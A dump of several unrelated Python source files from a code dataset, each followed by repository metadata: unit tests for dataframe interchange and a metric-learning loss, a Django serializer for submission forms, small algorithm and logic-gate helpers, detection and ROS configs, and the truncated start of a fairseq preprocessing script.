{"x": [True, True, False], "y": [1, 2, 0], "z": [9.2, 10.5, 11.8]}
)
dfX = df.__dataframe__()
assert dfX.num_columns() == 3
assert dfX.num_rows() == 3
assert dfX.num_chunks() == 1
assert list(dfX.column_names()) == ["x", "y", "z"]
assert list(dfX.select_columns((0, 2)).column_names()) == list(
dfX.select_columns_by_name(("x", "z")).column_names()
)
@pytest.mark.parametrize(["size", "n_chunks"], [(10, 3), (12, 3), (12, 5)])
def test_df_get_chunks(size, n_chunks, df_from_dict):
df = df_from_dict({"x": list(range(size))})
dfX = df.__dataframe__()
chunks = list(dfX.get_chunks(n_chunks))
assert len(chunks) == n_chunks
assert sum(chunk.num_rows() for chunk in chunks) == size
@pytest.mark.parametrize(["size", "n_chunks"], [(10, 3), (12, 3), (12, 5)])
def test_column_get_chunks(size, n_chunks, df_from_dict):
df = df_from_dict({"x": list(range(size))})
dfX = df.__dataframe__()
chunks = list(dfX.get_column(0).get_chunks(n_chunks))
assert len(chunks) == n_chunks
assert sum(chunk.size for chunk in chunks) == size
def test_get_columns(df_from_dict):
df = df_from_dict({"a": [0, 1], "b": [2.5, 3.5]})
dfX = df.__dataframe__()
for colX in dfX.get_columns():
assert colX.size == 2
assert colX.num_chunks() == 1
assert dfX.get_column(0).dtype[0] == 0
assert dfX.get_column(1).dtype[0] == 2
def test_buffer(df_from_dict):
arr = [0, 1, -1]
df = df_from_dict({"a": arr})
dfX = df.__dataframe__()
colX = dfX.get_column(0)
bufX = colX.get_buffers()
dataBuf, dataDtype = bufX["data"]
assert dataBuf.bufsize > 0
assert dataBuf.ptr != 0
device, _ = dataBuf.__dlpack_device__()
assert dataDtype[0] == 0
if device == 1: # CPU-only as we're going to directly read memory here
bitwidth = dataDtype[1]
ctype = {
8: ctypes.c_int8,
16: ctypes.c_int16,
32: ctypes.c_int32,
64: ctypes.c_int64,
}[bitwidth]
for idx, truth in enumerate(arr):
val = ctype.from_address(dataBuf.ptr + idx * (bitwidth // 8)).value
assert val == truth, f"Buffer at index {idx} mismatch"
| 31.850575 | 87 | 0.621075 |
ace72c9a29500594f0b4027c8dee9d49f3ede29b | 17,883 | py | Python | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 9 | 2017-02-13T18:17:13.000Z | 2020-11-21T20:15:54.000Z | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 2 | 2021-05-20T14:26:47.000Z | 2021-05-20T14:26:48.000Z | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 4 | 2017-04-02T18:48:59.000Z | 2021-11-23T15:40:35.000Z | import json
import zipfile, os, datetime
from tempfile import TemporaryFile
from uuid import uuid4
from collections import OrderedDict
from django.db import models
from django.contrib.contenttypes.fields import GenericRelation
from django.utils import timezone
from django.contrib.postgres.fields import ArrayField
from ecs.core.models import (
SubmissionForm, Submission, EthicsCommission, Investigator,
InvestigatorEmployee, Measure, ParticipatingCenterNonSubject,
ForeignParticipatingCenter, NonTestedUsedDrug,
)
from ecs.documents.models import Document, DocumentType
from ecs.core.paper_forms import get_field_info
CURRENT_SERIALIZER_VERSION = '1.3'
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S+01:00'
DATE_FORMAT = '%Y-%m-%d'
DATA_JSON_NAME = 'data.json'
CHANGELOG = (
('*', '0.1'),
('+', SubmissionForm, 'project_type_nursing_study', False),
('*', '0.2'),
('+', SubmissionForm, 'study_plan_multiple_test', False),
('+', SubmissionForm, 'study_plan_multiple_test', False),
('+', SubmissionForm, 'study_plan_interim_evaluation', False),
('+', SubmissionForm, 'study_plan_dataprotection_choice', 'non-personal'),
('*', '0.3'),
('+', SubmissionForm, 'sponsor_uid_verified_level1', None),
('+', SubmissionForm, 'sponsor_uid_verified_level2', None),
('*', '0.4'),
('-', SubmissionForm, 'sponsor_uid_verified_level1', None),
('-', SubmissionForm, 'sponsor_uid_verified_level2', None),
('-', SubmissionForm, 'invoice_uid_verified_level1', None),
('-', SubmissionForm, 'invoice_uid_verified_level2', None),
('+', SubmissionForm, 'sponsor_uid', None),
('*', '0.5'),
('+', SubmissionForm, 'insurance_not_required', False),
('*', '0.6'),
('+', SubmissionForm, 'external_reviewer_suggestions', 'nicht zutreffend'),
('*', '0.7'),
('+', SubmissionForm, 'project_type_non_interventional_study', False),
('+', SubmissionForm, 'project_type_gender_medicine', False),
('*', '0.8'),
('-', SubmissionForm, 'external_reviewer_suggestions', 'nicht zutreffend'),
('*', '0.9'),
('-', SubmissionForm, 'invoice', None),
('*', '1.0'),
('-', SubmissionForm, 'protocol_number', 'unbekannt'),
('*', '1.1'),
('+', SubmissionForm, 'study_plan_alpha_sided', None),
('*', '1.2'),
('-', SubmissionForm, 'sponsor_agrees_to_publishing', True),
('*', '1.3'),
)
class FieldDocs(object):
value = True
def __init__(self, model=None, field=None, choices=None):
self.model = model
if isinstance(field, ArrayField):
self.field = field.base_field
self.array = True
else:
self.field = field
self.array = False
self._choices = choices
def json_type(self):
if isinstance(self.field, models.BooleanField):
return "BOOLEAN"
elif isinstance(self.field, models.IntegerField):
return "INTEGER"
elif isinstance(self.field, (models.FloatField, models.DecimalField)):
return "FLOAT"
else:
return "STRING"
def constraints(self):
c = []
if isinstance(self.field, models.DateTimeField):
c.append(
"RFC 3339 with timezone UTC+1 (e.g. 2010-07-14T16:04:35+01:00)")
elif isinstance(self.field, models.DateField):
c.append("ISO 8601 with timezone UTC+1 (e.g. 2010-07-14)")
elif isinstance(self.field, models.CharField):
c.append("max. {} characters".format(self.field.max_length))
elif isinstance(self.field, models.FileField):
c.append("valid internal zip file path")
if self.field and self.field.null:
c.append("may be null")
return c
def choices(self):
if self._choices:
cs = self._choices
elif self.field:
cs = self.field.choices
if cs:
return [(json.dumps(k), v) for k, v in cs]
def paperform_info(self):
if self.field:
return get_field_info(self.model, self.field.name)
class ModelSerializer(object):
exclude = ('id',)
groups = ()
follow = ()
fields = ()
def __init__(self, model, groups=None, exclude=None, follow=None, fields=None):
self.model = model
if groups:
self.groups = groups
if exclude:
self.exclude = exclude
if follow:
self.follow = follow
if fields:
self.fields = fields
def is_field_obsolete(self, field, version):
version_index = CHANGELOG.index(('*', version))
for entry in CHANGELOG[-1:version_index:-1]:
if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
return False
if entry[0] == '-' and entry[1] == self.model and entry[2] == field:
return True
return False
def is_field_coming(self, field, version):
version_index = CHANGELOG.index(('*', version))
for entry in CHANGELOG[-1:version_index:-1]:
if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
return True
if entry[0] == '-' and entry[1] == self.model and entry[2] == field:
return False
return False
def get_default_for_coming_field(self, field, version):
version_index = CHANGELOG.index(('*', version))
for entry in CHANGELOG[-1:version_index:-1]:
if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
return entry[3]
def get_field_names(self):
names = set(f.name for f in self.model._meta.fields if f.name not in self.exclude)
if self.fields:
names = names.intersection(self.fields)
return names.union(self.follow)
def split_prefix(self, name):
prefix, key = None, name
for group in self.groups:
if name.startswith(group):
prefix, key = group, name[len(group)+1:]
break
return prefix, key
def dump_field(self, fieldname, val, zf, obj):
if val is None or isinstance(val, (bool, str, int, list, datetime.datetime, datetime.date)):
return val
if hasattr(val, 'all') and hasattr(val, 'count'):
try:
result = []
for x in val.all():
result.append(dump_model_instance(x, zf))
return result
except ValueError as e:
raise ValueError("cannot dump {}.{}: {}".format(
self.model.__name__, fieldname, e))
field = self.model._meta.get_field(fieldname)
if isinstance(field, models.ForeignKey):
return dump_model_instance(val, zf)
elif isinstance(field, models.FileField):
name, ext = os.path.splitext(val.name)
zip_name = 'attachments/{}{}'.format(uuid4(), ext)
zf.write(val.path, zip_name)
return zip_name
else:
raise ValueError(
"cannot serialize objects of type {}".format(type(val)))
return val
def dump(self, obj, zf):
d = {}
for name in self.get_field_names():
prefix, key = self.split_prefix(name)
data = self.dump_field(name, getattr(obj, name), zf, obj)
if prefix:
d.setdefault(prefix, {})
d[prefix][key] = data
else:
d[name] = data
return d
def load_many(self, model, val, zf, version, commit=True):
result = []
for data in val:
result.append(load_model_instance(
model, data, zf, version, commit=commit))
return result
def load_field(self, fieldname, val, zf, version):
if val is None:
return val, False
try:
field = self.model._meta.get_field(fieldname)
except models.fields.FieldDoesNotExist:
field = None
deferr = False
if field:
if isinstance(field, models.DateTimeField):
val = timezone.make_aware(
datetime.datetime.strptime(val, DATETIME_FORMAT),
timezone.utc)
elif isinstance(field, models.DateField):
val = datetime.date.strptime(val, DATE_FORMAT)
elif isinstance(field, models.ManyToManyField):
val = self.load_many(field.related_model, val, zf, version)
deferr = True
elif isinstance(field, models.ManyToOneRel):
val = self.load_many(field.related_model, val, zf, version,
commit=False)
deferr = True
elif isinstance(field, models.ForeignKey):
val = load_model_instance(field.rel.to, val, zf, version)
elif isinstance(field, GenericRelation):
val = self.load_many(field.rel.to, val, zf, version,
commit=False)
deferr = True
elif isinstance(val, list):
rel_model = getattr(self.model, fieldname).related.related_model
val = self.load_many(rel_model, val, zf, version, commit=False)
deferr = True
return val, deferr
def load(self, data, zf, version, commit=True):
deferred = []
fields = {}
obj = self.model()
for name in self.get_field_names():
prefix, key = self.split_prefix(name)
if self.is_field_obsolete(name, version):
continue
elif self.is_field_coming(name, version):
val = self.get_default_for_coming_field(name, version)
else:
if prefix:
if prefix in data:
val = data[prefix][key]
else:
continue
elif key in data:
val = data[key]
else:
continue
val, deferr = self.load_field(name, val, zf, version)
if deferr:
deferred.append((name, val, deferr))
else:
fields[name] = val
obj = self.model(**fields)
obj.clean()
old_save = obj.save
def _save(*args, **kwargs):
del obj.save
old_save(*args, **kwargs)
for name, val, action in deferred:
manager = getattr(obj, name)
for item in val:
manager.add(item)
obj.save = _save
if commit:
obj.save()
return obj
def get_field_docs(self, fieldname):
try:
field = self.model._meta.get_field(fieldname)
if isinstance(field, models.ForeignKey):
return _serializers[field.rel.to].docs()
elif isinstance(field, models.ManyToManyField):
spec = _serializers[field.rel.to].docs()
spec['array'] = True
return spec
elif isinstance(field, models.ManyToOneRel):
spec = _serializers[field.related_model].docs()
spec['array'] = True
return spec
return FieldDocs(self.model, field)
except models.FieldDoesNotExist:
model = getattr(self.model, fieldname).related.related_model
spec = _serializers[model].docs()
spec['array'] = True
return spec
def docs(self):
d = OrderedDict()
for name in sorted(self.get_field_names()):
prefix, key = self.split_prefix(name)
info = self.get_field_docs(name)
if prefix:
d.setdefault(prefix, OrderedDict())
d[prefix][key] = info
else:
d[name] = info
return d
class DocumentTypeSerializer(object):
def load(self, data, zf, version, commit=True):
try:
return DocumentType.objects.get(name=data)
except DocumentType.DoesNotExist:
raise ValueError("no such doctype: {1}".format(data))
def docs(self):
return FieldDocs(choices=[
(doctype.name, doctype.name)
for doctype in DocumentType.objects.all()
])
def dump(self, obj, zf):
return obj.name
class DocumentSerializer(ModelSerializer):
def dump(self, obj, zf):
assert obj.doctype.is_downloadable
d = super().dump(obj, zf)
zip_name = 'attachments/{}'.format(uuid4())
if obj.mimetype == 'application/pdf':
zip_name += '.pdf'
f = obj.retrieve_raw()
zf.writestr(zip_name, f.read())
f.close()
d['file'] = zip_name
return d
def load(self, data, zf, version, commit=True):
obj = super().load(data, zf, version, commit=commit)
if commit:
with TemporaryFile() as f:
f.write(zf.read(data['file']))
f.flush()
f.seek(0)
obj.store(f)
return obj
class EthicsCommissionSerializer(object):
def load(self, data, zf, version, commit=False):
try:
return EthicsCommission.objects.get(uuid=data)
except EthicsCommission.DoesNotExist:
raise ValueError("no such ethicscommission: {}".format(data))
def docs(self):
return FieldDocs(choices=[
(ec.uuid.hex, ec.name)
for ec in EthicsCommission.objects.all()
])
def dump(self, obj, zf):
return obj.uuid.hex
class SubmissionSerializer(ModelSerializer):
def __init__(self, **kwargs):
super().__init__(Submission, **kwargs)
def load(self, data, zf, version, commit=False):
return Submission.objects.create(is_transient=True)
class SubmissionFormSerializer(ModelSerializer):
def dump_field(self, fieldname, val, zf, obj):
if fieldname == 'documents':
val = val.filter(doctype__is_downloadable=True)
return super().dump_field(fieldname, val, zf, obj)
def load(self, data, zf, version, commit=True):
obj = super().load(data, zf, version, commit=False)
obj.is_transient = True
if commit:
obj.save()
return obj
_serializers = {
SubmissionForm: SubmissionFormSerializer(SubmissionForm,
groups = (
'study_plan', 'insurance', 'sponsor', 'invoice', 'german',
'submitter', 'project_type', 'medtech', 'substance', 'subject',
),
exclude = (
'pdf_document', 'id', 'current_pending_vote',
'current_published_vote', 'primary_investigator', 'submitter',
'sponsor', 'presenter', 'is_transient', 'is_notification_update',
'is_acknowledged',
),
follow = (
'participatingcenternonsubject_set',
'foreignparticipatingcenter_set', 'investigators', 'measures',
'documents', 'nontesteduseddrug_set',
),
),
Submission: SubmissionSerializer(fields=('ec_number',)),
Investigator: ModelSerializer(Investigator,
exclude=('id', 'submission_form', 'user'),
follow=('employees',)
),
InvestigatorEmployee: ModelSerializer(InvestigatorEmployee,
exclude=('id', 'investigator')
),
Measure: ModelSerializer(Measure, exclude=('id', 'submission_form')),
ParticipatingCenterNonSubject: ModelSerializer(
ParticipatingCenterNonSubject,
exclude=('id', 'submission_form')
),
ForeignParticipatingCenter: ModelSerializer(ForeignParticipatingCenter,
exclude=('id', 'submission_form')
),
NonTestedUsedDrug: ModelSerializer(NonTestedUsedDrug,
exclude=('id', 'submission_form')
),
Document: DocumentSerializer(Document,
fields=(
'doctype', 'name', 'original_file_name', 'date', 'version',
'mimetype',
)
),
DocumentType: DocumentTypeSerializer(),
EthicsCommission: EthicsCommissionSerializer(),
}
def load_model_instance(model, data, zf, version, commit=True):
if model not in _serializers:
raise ValueError("cannot load objects of type {}".format(model))
return _serializers[model].load(data, zf, version, commit=commit)
def dump_model_instance(obj, zf):
if obj.__class__ not in _serializers:
raise ValueError(
"cannot serialize objecs of type {}".format(obj.__class__))
return _serializers[obj.__class__].dump(obj, zf)
class _JsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.astimezone(timezone.utc).strftime(DATETIME_FORMAT)
elif isinstance(obj, datetime.date):
return obj.strftime(DATE_FORMAT)
return super().default(obj)
class Serializer(object):
version = CURRENT_SERIALIZER_VERSION
def read(self, file_like):
zf = zipfile.ZipFile(file_like, 'r')
data = json.loads(zf.read(DATA_JSON_NAME).decode('utf-8'))
submission_form = _serializers[SubmissionForm].load(
data['data'], zf, data['version'])
return submission_form
def write(self, submission_form, file_like):
zf = zipfile.ZipFile(file_like, 'w', zipfile.ZIP_DEFLATED)
data = {
'version': self.version,
'type': 'SubmissionForm',
'data': dump_model_instance(submission_form, zf),
}
zf.writestr(DATA_JSON_NAME,
json.dumps(data, cls=_JsonEncoder, indent=2, sort_keys=True).encode('utf-8'))
def docs(self):
return _serializers[SubmissionForm].docs()
| 35.837675 | 100 | 0.578371 |
ace72d5e05418b828c6c62fb2718ee88476f1e3a | 3,492 | py | Python | tests/losses/test_margin_loss.py | wconnell/pytorch-metric-learning | 1affee7c77bb5d6d4ee559bad62b910a21b39d48 | [
"MIT"
] | 1 | 2021-01-27T03:36:19.000Z | 2021-01-27T03:36:19.000Z | tests/losses/test_margin_loss.py | umitkacar/pytorch-metric-learning | bf2b7675b7b80e5762b75428d51e4ab0a861e710 | [
"MIT"
] | null | null | null | tests/losses/test_margin_loss.py | umitkacar/pytorch-metric-learning | bf2b7675b7b80e5762b75428d51e4ab0a861e710 | [
"MIT"
] | null | null | null | import unittest
from .. import TEST_DTYPES
import torch
from pytorch_metric_learning.losses import MarginLoss
from pytorch_metric_learning.utils import common_functions as c_f
class TestMarginLoss(unittest.TestCase):
@classmethod
def setUpClass(self):
self.device = torch.device('cuda')
def test_margin_loss(self):
for dtype in TEST_DTYPES:
for learn_beta, num_classes in [(False, None), (True, None), (False, 3), (True, 3)]:
margin, nu, beta = 0.1, 0.1, 1
loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=learn_beta, num_classes=num_classes)
embedding_angles = [0, 20, 40, 60, 80]
embeddings = torch.tensor([c_f.angle_to_coord(a) for a in embedding_angles], requires_grad=True, dtype=dtype).to(self.device) #2D embeddings
labels = torch.LongTensor([0, 0, 1, 1, 2])
loss = loss_func(embeddings, labels)
loss.backward()
triplets = [(0,1,2), (0,1,3), (0,1,4), (1,0,2), (1,0,3), (1,0,4), (2,3,0), (2,3,1), (2,3,4), (3,2,0), (3,2,1), (3,2,4)]
correct_total_loss = 0
num_non_zero = 0
for a, p, n in triplets:
anchor, positive, negative = embeddings[a], embeddings[p], embeddings[n]
pos_loss = torch.relu(torch.sqrt(torch.sum((anchor-positive)**2)) - beta + margin)
neg_loss = torch.relu(beta - torch.sqrt(torch.sum((anchor-negative)**2)) + margin)
correct_total_loss += pos_loss + neg_loss
if pos_loss > 0:
num_non_zero += 1
if neg_loss > 0:
num_non_zero += 1
if num_non_zero > 0:
correct_total_loss /= num_non_zero
if learn_beta:
if num_classes is None:
correct_beta_reg_loss = (loss_func.beta*nu)
else:
anchor_idx = [x[0] for x in triplets]
correct_beta_reg_loss = torch.sum(loss_func.beta[labels[anchor_idx]]*nu) / num_non_zero
correct_total_loss += correct_beta_reg_loss.item()
rtol = 1e-2 if dtype == torch.float16 else 1e-5
self.assertTrue(torch.isclose(loss, correct_total_loss, rtol=rtol))
def test_with_no_valid_triplets(self):
margin, nu, beta = 0.1, 0, 1
loss_func = MarginLoss(margin=margin, nu=nu, beta=beta)
for dtype in TEST_DTYPES:
embedding_angles = [0, 20, 40, 60, 80]
embeddings = torch.tensor([c_f.angle_to_coord(a) for a in embedding_angles], requires_grad=True, dtype=dtype).to(self.device) #2D embeddings
labels = torch.LongTensor([0, 1, 2, 3, 4])
loss = loss_func(embeddings, labels)
loss.backward()
self.assertEqual(loss, 0)
def test_beta_datatype(self):
margin, nu, beta = 0.1, 0, 1
loss_func = MarginLoss(margin=margin, nu=nu, beta=beta)
self.assertTrue(len(loss_func.beta) == 1)
loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=True)
self.assertTrue(len(loss_func.beta) == 1)
loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=True, num_classes=35)
self.assertTrue(len(loss_func.beta) == 35)
| 47.835616 | 156 | 0.567583 |
ace72d5ffcbac14553e4625386057ed493b32bd2 | 524 | py | Python | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 19 | 2019-03-14T01:39:32.000Z | 2022-02-03T00:36:43.000Z | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 1 | 2020-04-10T01:01:16.000Z | 2020-04-10T01:01:16.000Z | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 5 | 2019-01-02T20:46:05.000Z | 2020-07-08T22:47:48.000Z | #
# Algorithms: Algorithms in Code (Linear Search)
# Python Techdegree
#
# Created by Dulio Denis on 3/23/19.
# Copyright (c) 2019 ddApps. All rights reserved.
# ------------------------------------------------
def linear_search(list, target):
'''
Returns the index position of the target if found, else returns None
'''
for i, item in enumerate(list):
if item == target:
return i
return None
list = [1, 2, 3, 4, 5, 6]
print(linear_search(list, 3))
print(linear_search(list, 7))
| 26.2 | 72 | 0.585878 |
ace72d76e586ad908c9da3987fafaf550c48ca26 | 1,049 | py | Python | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | '''----------------------------- Imports -----------------------------'''
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
negativeOne_ = 2 ** N_BITS - 1 # two's complement
def toBin( x ):
return bin( x )[ 2 : ].zfill( N_BITS )
def toInt( a ):
return int( ''.join( map( str, a ) ), 2 )
'''------------------- The elementary logic gates -------------------'''
def not_( x ):
return x ^ 1
'''------------------ Multiplexers & Demultiplexers ------------------'''
def mux8to1_( d7, d6, d5, d4, d3, d2, d1, d0, s2, s1, s0 ):
sel = str( s2 ) + str( s1 ) + str( s0 )
out = d0 if sel == '000' else \
d1 if sel == '001' else \
d2 if sel == '010' else \
d3 if sel == '011' else \
d4 if sel == '100' else \
d5 if sel == '101' else \
d6 if sel == '110' else \
d7 # if sel == '111'
return out
'''------------------------- N-bit variants -------------------------'''
def notN_( x ):
return x ^ negativeOne_
| 19.425926 | 73 | 0.401335 |
ace72d7d5edc58275dcb335362f427b809b99930 | 2,489 | py | Python | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | _base_ = '../config/faster_rcnn_r50_fpn_2x.py'
dataset_type = 'FabricDataset'
data_root = '/home/jkx/project/smallq/tianchidata_coco_base/' # Root path of data
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'), # First pipeline to load images from file path
dict(type='LoadAnnotations', with_bbox=True), # Second pipeline to load annotations for current image
dict(
type='Resize', # Augmentation pipeline that resize the images and their annotations
img_scale=[(3400, 800), (3400, 1200)],
multiscale_mode='range',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5), #翻转 flip_ratio 为翻转概率
dict(type='Normalize', **img_norm_cfg), #规范化image
dict(type='Pad', size_divisor=32), # padding设置,填充图片可被32整出除
dict(type='DefaultFormatBundle'), # Default format bundle to gather data in the pipeline
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), #决定将哪些关键数据传给detection的管道
]
test_pipeline = [
dict(type='LoadImageFromFile'), #加载图片的pipline
dict(
type='MultiScaleFlipAug',
img_scale=(3400, 1000), #最大test scale
flip=True, #测试时是否翻转图片
transforms=[
dict(type='Resize', keep_ratio=True), #保持原始比例的resize
dict(type='RandomFlip'), #
dict(type='Normalize', **img_norm_cfg), #规范化
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']), #将图片转为tensor
dict(type='Collect', keys=['img']), #获取关键信息的pipline
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=1,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train0331.json',
img_prefix=data_root + 'train_image_low_1200/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val0331.json',
img_prefix=data_root + 'defect_images/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val0331.json',
img_prefix=data_root + 'defect_images/',
pipeline=test_pipeline))
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
total_epochs = 24
checkpoint_config = dict(interval=5)
work_dir = '../data/work_dirs/faster_rcnn_r50_fpn_2x_l1200' | 40.803279 | 105 | 0.664524 |
ace72e07c225cfb0894e647b110a7647eeadd15c | 1,609 | py | Python | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
package_name = 'examples_tf2_py'
setup(
name=package_name,
version='0.26.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
('share/' + package_name + '/launch', ['launch/broadcasters.launch.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
author='Shane Loretz',
author_email='sloretz@openrobotics.org',
maintainer='Alejandro Hernandez Cordero, Chris Lalancette',
maintainer_email='alejandro@openrobotics.org, clalancette@openrobotics.org',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description=(
'Has examples of using the tf2 python api.'
),
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'static_broadcaster = examples_tf2_py.static_broadcaster:main',
'dynamic_broadcaster = examples_tf2_py.dynamic_broadcaster:main',
'frame_dumper = examples_tf2_py.frame_dumper:main',
'waits_for_transform = examples_tf2_py.waits_for_transform:main',
'blocking_waits_for_transform = examples_tf2_py.blocking_waits_for_transform:main',
'async_waits_for_transform = examples_tf2_py.async_waits_for_transform:main',
],
},
)
| 36.568182 | 95 | 0.661902 |
ace72ebfbbbea50cc8a5e605f5dff098dd1abd24 | 14,197 | py | Python | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 76 | 2019-11-25T04:00:15.000Z | 2022-03-31T00:33:44.000Z | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 22 | 2019-10-10T09:39:24.000Z | 2022-03-28T06:39:06.000Z | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 20 | 2019-10-08T17:02:17.000Z | 2022-03-20T01:43:42.000Z | #!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Data pre-processing: build vocabularies and binarize training data.
"""
import os
import shutil
from collections import Counter
import numpy as np
# from fairseq import options, tasks, utils
from fairseq import tasks
# from fairseq.data import indexed_dataset
from fairseq.binarizer import Binarizer
from multiprocessing import Pool
from fairseq.tokenizer import tokenize_line
from fairseq_ext.utils_import import import_user_module
from fairseq_ext.data import indexed_dataset
from fairseq_ext import options
from fairseq_ext.extract_bart.binarize_encodings import make_bart_encodings
def main(args):
import_user_module(args)
print(args)
# to control what preprocessing needs to be run (as they take both time and storage so we avoid running repeatedly)
run_basic = True
# this includes:
# src: build src dictionary, copy the raw data to dir; build src binary data (need to refactor later if this is not needed)
# tgt: split target pointer values into a separate file; build tgt dictionary, binarize the actions and pointer values
run_act_states = True
# this includes:
# run the state machine in canonical mode to get states information to facilitate modeling;
# takes about 1 hour and 13G space
run_roberta_emb = True
# this includes:
# for src sentences, use pre-trained RoBERTa model to extract contextual embeddings for each word;
# takes about 10min for RoBERTa base and 30 mins for RoBERTa large and 2-3G space;
# this needs GPU and only needs to run once for the English sentences, which does not change for different oracles;
# thus the embeddings are stored separately from the oracles.
if os.path.exists(os.path.join(args.destdir, '.done')):
print(f'binarized actions and states directory {args.destdir} already exists; not rerunning.')
run_basic = False
run_act_states = False
if os.path.exists(os.path.join(args.embdir, '.done')):
print(f'pre-trained embedding directory {args.embdir} already exists; not rerunning.')
run_roberta_emb = False
os.makedirs(args.destdir, exist_ok=True)
os.makedirs(args.embdir, exist_ok=True)
target = not args.only_source
task = tasks.get_task(args.task)
# preprocess target actions files, to split '.actions' to '.actions_nopos' and '.actions_pos'
# when building dictionary on the target actions sequences
# split the action file into two files, one without arc pointer and one with only arc pointer values
# and the dictionary is only built on the no pointer actions
if run_basic:
assert args.target_lang == 'actions', 'target extension must be "actions"'
actions_files = [f'{pref}.{args.target_lang}' for pref in (args.trainpref, args.validpref, args.testpref)]
task.split_actions_pointer_files(actions_files)
args.target_lang_nopos = 'actions_nopos' # only build dictionary without pointer values
args.target_lang_pos = 'actions_pos'
# set tokenizer
tokenize = task.tokenize if hasattr(task, 'tokenize') else tokenize_line
def train_path(lang):
return "{}{}".format(args.trainpref, ("." + lang) if lang else "")
def file_name(prefix, lang):
fname = prefix
if lang is not None:
fname += ".{lang}".format(lang=lang)
return fname
def dest_path(prefix, lang):
return os.path.join(args.destdir, file_name(prefix, lang))
def dict_path(lang):
return dest_path("dict", lang) + ".txt"
def build_dictionary(filenames, src=False, tgt=False):
assert src ^ tgt
return task.build_dictionary(
filenames,
workers=args.workers,
threshold=args.thresholdsrc if src else args.thresholdtgt,
nwords=args.nwordssrc if src else args.nwordstgt,
padding_factor=args.padding_factor,
# tokenize separator is taken care inside task
)
# build dictionary and save
if run_basic:
# if not args.srcdict and os.path.exists(dict_path(args.source_lang)):
# raise FileExistsError(dict_path(args.source_lang))
# if target and not args.tgtdict and os.path.exists(dict_path(args.target_lang)):
# raise FileExistsError(dict_path(args.target_lang))
